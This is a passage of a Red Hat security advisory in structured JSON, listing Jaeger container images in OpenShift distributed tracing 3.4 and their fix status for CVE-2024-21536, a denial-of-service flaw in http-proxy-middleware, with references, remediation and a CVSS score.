"name": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64 as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" }, { "category": "default_component_of", "full_product_name": { "name": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le as a component of Red Hat OpenShift distributed tracing 3.4", "product_id": "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" }, "product_reference": "registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le", "relates_to_product_reference": "Red Hat OpenShift distributed tracing 3.4" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-21536", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2024-10-19T06:00:36.846953+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2319884" } ], "notes": [ { "category": "description", "text": "A flaw was found in the http-proxy-middleware package. Affected versions of this package are vulnerable to denial of service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. This flaw allows an attacker to kill the Node.js process and crash the server by requesting certain paths.", "title": "Vulnerability description" }, { "category": "summary", "text": "http-proxy-middleware: Denial of Service", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-21536" }, { "category": "external", "summary": "RHBZ#2319884", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319884" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-21536", "url": "https://www.cve.org/CVERecord?id=CVE-2024-21536" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-21536", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21536" }, { "category": "external", "summary": "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a", "url": "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a" }, { "category": "external", "summary": "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5", "url": "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5" }, { "category": "external", "summary": "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22", "url": "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22" }, { "category": "external", "summary": "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906", "url": "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906" } ], "release_date": "2024-10-19T05:00:04.056000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Red Hat Product Security does not have any mitigation recommendations at this time.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift 